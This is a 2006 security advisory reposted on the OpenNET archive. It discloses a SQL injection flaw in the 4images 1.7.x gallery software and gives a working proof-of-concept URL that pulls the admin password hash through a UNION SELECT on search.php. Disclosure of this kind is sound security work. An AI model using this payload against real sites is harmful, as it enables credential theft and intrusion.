The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


SQL injection - 4images


<< Previous INDEX Search src / Print Next >>
Date: Sun, 8 Oct 2006 16:22:13 -0500
From: disfigure <disfigure@gmail.com.>
To: [email protected]
Subject: SQL injection - 4images
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
X-Virus-Scanned: antivirus-gw at tyumen.ru

/****************************************/
http://www.w4cking.com

Product:
4images 1.7.x
http://www.4homepages.de

Vulnerability:
SQL injection

Notes:
- SQL injection can be used to obtain password hash
- for version 1.7.3, you must log in as a registered user

POC:
<target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%20user_name=%2527ADMIN

Original advisory with exploit script (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1037

/****************************************/


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру